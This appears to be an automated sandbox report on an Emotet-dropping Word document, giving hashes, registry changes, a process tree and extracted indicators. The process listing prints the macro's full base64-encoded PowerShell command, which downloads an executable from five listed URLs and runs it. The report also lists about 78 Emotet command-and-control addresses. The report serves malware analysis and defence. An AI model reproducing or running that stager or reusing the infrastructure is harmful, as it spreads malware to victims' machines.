Analysis
-
max time kernel
144s -
max time network
157s -
platform
windows7_x64 -
resource
win7 -
submitted
07-08-2020 07:06
Static task
static1
Behavioral task
behavioral1
Sample
FILE_X583677.doc
Resource
win7
General
-
Target
FILE_X583677.doc
-
Size
169KB
-
MD5
9bcd7831593b18eb2fc20abb950776e0
-
SHA1
94fce0e45271cd1dc5ff594f886146c88b5bdf75
-
SHA256
2e480d827237d7ae78d5b296e18e6a0cd466c5f3e09abf96f8bb53d927c4bab8
-
SHA512
ce5e923278b315e334274b0b1f9434aaa2851135fb0fb4f147b8e123da1f595e50a70fc47079f8f3c8c5c6a43f9b5b04a5dbf799f29491bb73d716304892dfdc
Malware Config
Extracted
http://sampling-group.com/J0Eubtq06/
http://www.weddingsday.co.uk/docs/1oYncTNHDu/
http://sasystemsuk.com/recruit/sl979/
http://wellparts.net/cgi-bin/qAj081/
http://volkanakbalik.com/_inc/2W/
Extracted
emotet
82.76.111.249:443
116.125.120.88:443
217.160.182.191:8080
189.1.185.98:8080
189.194.58.119:80
213.181.91.224:80
219.92.13.25:80
190.6.193.152:8080
61.92.159.208:8080
209.236.123.42:8080
12.162.84.2:8080
190.147.137.153:443
104.131.103.37:8080
212.231.60.98:80
202.62.39.111:80
82.240.207.95:443
170.81.48.2:80
177.74.228.34:80
82.196.15.205:8080
114.109.179.60:80
70.32.115.157:8080
178.79.163.131:8080
104.131.41.185:8080
190.17.195.202:80
145.236.8.174:80
143.0.87.101:80
71.50.31.38:80
72.47.248.48:7080
201.213.156.176:80
192.241.143.52:8080
89.32.150.160:8080
177.66.190.130:80
137.74.106.111:7080
181.36.42.205:443
149.62.173.247:8080
186.70.127.199:8090
190.163.31.26:80
104.236.161.64:8080
77.55.211.77:8080
5.196.35.138:7080
190.181.235.46:80
45.161.242.102:80
172.104.169.32:8080
94.176.234.118:443
87.106.46.107:8080
111.67.12.221:8080
77.90.136.129:8080
80.249.176.206:80
186.103.141.250:443
73.116.193.136:80
177.144.135.2:80
51.255.165.160:8080
68.183.170.114:8080
217.199.160.224:7080
190.190.148.27:8080
2.47.112.152:80
192.241.146.84:8080
70.32.84.74:8080
181.120.79.227:80
177.72.13.80:80
204.225.249.100:7080
191.182.6.118:80
191.99.160.58:80
93.151.186.85:80
217.13.106.14:8080
186.250.52.226:8080
177.73.0.98:443
185.94.252.12:80
91.219.169.180:80
50.28.51.143:8080
189.2.177.210:443
68.183.190.199:8080
187.162.248.237:80
46.28.111.142:7080
212.71.237.140:8080
83.169.21.32:7080
181.129.96.162:8080
185.94.252.27:443
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1448 WINWORD.EXE -
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{53702F37-9D13-4C6A-876A-69EAD375B8B2} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{53702F37-9D13-4C6A-876A-69EAD375B8B2}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{53702F37-9D13-4C6A-876A-69EAD375B8B2}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{53702F37-9D13-4C6A-876A-69EAD375B8B2}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{53702F37-9D13-4C6A-876A-69EAD375B8B2}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{53702F37-9D13-4C6A-876A-69EAD375B8B2}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{53702F37-9D13-4C6A-876A-69EAD375B8B2}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{53702F37-9D13-4C6A-876A-69EAD375B8B2}\2.0\0\win32 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{53702F37-9D13-4C6A-876A-69EAD375B8B2}\2.0\FLAGS WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE -
Drops file in System32 directory 2 IoCs
Processes:
powersheLL.exe848.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powersheLL.exe File opened for modification C:\Windows\SysWOW64\regapi\vdmdbg.exe 848.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powersheLL.exeflow pid process 5 1828 powersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
848.exevdmdbg.exepid process 1796 848.exe 1588 vdmdbg.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
848.exedescription pid process target process PID 1796 wrote to memory of 1588 1796 848.exe vdmdbg.exe PID 1796 wrote to memory of 1588 1796 848.exe vdmdbg.exe PID 1796 wrote to memory of 1588 1796 848.exe vdmdbg.exe PID 1796 wrote to memory of 1588 1796 848.exe vdmdbg.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral1/memory/1796-15-0x00000000003B0000-0x00000000003BC000-memory.dmp emotet behavioral1/memory/1796-15-0x00000000003B0000-0x00000000003BC000-memory.dmp emotet behavioral1/memory/1588-19-0x0000000000380000-0x000000000038C000-memory.dmp emotet behavioral1/memory/1588-19-0x0000000000380000-0x000000000038C000-memory.dmp emotet -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
WINWORD.EXE848.exevdmdbg.exepid process 1448 WINWORD.EXE 1448 WINWORD.EXE 1796 848.exe 1796 848.exe 1588 vdmdbg.exe 1588 vdmdbg.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1828 1092 powersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 1828 powersheLL.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powersheLL.exevdmdbg.exepid process 1828 powersheLL.exe 1828 powersheLL.exe 1588 vdmdbg.exe 1588 vdmdbg.exe -
Office loads VBA resources, possible macro or embedded object present
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\FILE_X583677.doc"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABHAEQAWgBBAFoAeABwAGgAPQAnAFAATABKAFMAUQBtAGIAdgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABDAHUAUgBpAHQAWQBQAGAAUgBvAHQAbwBjAGAATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQATgBXAEIATABGAHoAcgBnACAAPQAgACcAOAA0ADgAJwA7ACQAWgBFAEgARwBMAHQAbAB3AD0AJwBSAEsAWQBBAEkAeAB5AHcAJwA7ACQAWgBVAEMASwBYAGQAaQBmAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAFcAQgBMAEYAegByAGcAKwAnAC4AZQB4AGUAJwA7ACQAWgBWAEYAVQBRAHoAdAB1AD0AJwBWAEYATwBKAEsAZABhAGcAJwA7ACQARABZAFQAVgBNAHMAdQBxAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMATABpAGUAbgBUADsAJABKAEMASwBQAFEAegB6AHMAPQAnAGgAdAB0AHAAOgAvAC8AcwBhAG0AcABsAGkAbgBnAC0AZwByAG8AdQBwAC4AYwBvAG0ALwBKADAARQB1AGIAdABxADAANgAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHcAZQBkAGQAaQBuAGcAcwBkAGEAeQAuAGMAbwAuAHUAawAvAGQAbwBjAHMALwAxAG8AWQBuAGMAVABOAEgARAB1AC8AKgBoAHQAdABwADoALwAvAHMAYQBzAHkAcwB0AGUAbQBzAHUAawAuAGMAbwBtAC8AcgBlAGMAcgB1AGkAdAAvAHMAbAA5ADcAOQAvACoAaAB0AHQAcAA6AC8ALwB3AGUAbABsAHAAYQByAHQAcwAuAG4AZQB0AC8AYwBnAGkALQBiAGkAbgAvAHEAQQBqADAAOAAxAC8AKgBoAHQAdABwADoALwAvAHYAbwBsAGsAYQBuAGEAawBiAGEAbABpAGsALgBjAG8AbQAvAF8AaQBuAGMALwAyAFcALwAnAC4AIgBzAHAAYABMAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFkAVwBPAEgATgBiAHYAcAA9ACcAUgBLAEIAVQBTAHEAagB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABDAFAAWABSAE8AYQBlAHoAIABpAG4AIAAkAEoAQwBLAFAAUQB6AHoAcwApAHsAdAByAHkAewAkAEQAWQBUAFYATQBzAHUAcQAuACIAZABPAGAAdwBOAEwATwBhAGAAZABGAEkATABFACIAKAAkAEMAUABYAFIATwBhAGUAegAsACAAJABaAFUAQwBLAFgAZABpAGYAKQA7ACQATABFAE8ASQBOAHEAdgBxAD0AJwBGAEgAWgBWAFoAYgBhAHoAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACAAJABaAFUAQwBLAFgAZABpAGYAKQAuACIAbABFAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADkAOQA1ADYAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAGUAYABBAHQARQAiACgAJABaAFUAQwBLAFgAZABpAGYAKQA7ACQAUwBIAEQAWQBBAGYAYgBqAD0AJwBBAE4AWABaAE8AYwBvAGIAJwA7AGIAcgBlAGEAawA7ACQAUQBJAFgATABYAGsAcQBoAD0AJwBXAEwAWgBVAFMAcQBnAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQBHAE8AQwBNAGgAegBwAD0AJwBIAEkATABTAEwAegBxAGoAJwA=1⤵
- Drops file in System32 directory
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\848.exeC:\Users\Admin\848.exe1⤵
- Drops file in System32 directory
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regapi\vdmdbg.exe"C:\Windows\SysWOW64\regapi\vdmdbg.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\848.exe
-
C:\Users\Admin\848.exe
-
C:\Windows\SysWOW64\regapi\vdmdbg.exe
-
memory/1448-6-0x000000000BC10000-0x000000000BC14000-memory.dmpFilesize
16KB
-
memory/1448-5-0x000000000AB90000-0x000000000AB94000-memory.dmpFilesize
16KB
-
memory/1448-3-0x0000000006F50000-0x0000000007150000-memory.dmpFilesize
2.0MB
-
memory/1448-2-0x0000000008B20000-0x0000000008B24000-memory.dmpFilesize
16KB
-
memory/1448-4-0x0000000006F50000-0x0000000007150000-memory.dmpFilesize
2.0MB
-
memory/1588-19-0x0000000000380000-0x000000000038C000-memory.dmpFilesize
48KB
-
memory/1588-17-0x0000000000000000-mapping.dmp
-
memory/1796-15-0x00000000003B0000-0x00000000003BC000-memory.dmpFilesize
48KB
-
memory/1828-9-0x000000001ABA0000-0x000000001ABA1000-memory.dmpFilesize
4KB
-
memory/1828-13-0x000000001AA80000-0x000000001AA81000-memory.dmpFilesize
4KB
-
memory/1828-12-0x000000001B600000-0x000000001B601000-memory.dmpFilesize
4KB
-
memory/1828-11-0x0000000002300000-0x0000000002301000-memory.dmpFilesize
4KB
-
memory/1828-10-0x00000000022D0000-0x00000000022D1000-memory.dmpFilesize
4KB
-
memory/1828-8-0x0000000001D60000-0x0000000001D61000-memory.dmpFilesize
4KB
-
memory/1828-7-0x000007FEF2090000-0x000007FEF2A7C000-memory.dmpFilesize
9.9MB
-
memory/2004-20-0x000007FEF27B0000-0x000007FEF2A2A000-memory.dmpFilesize
2.5MB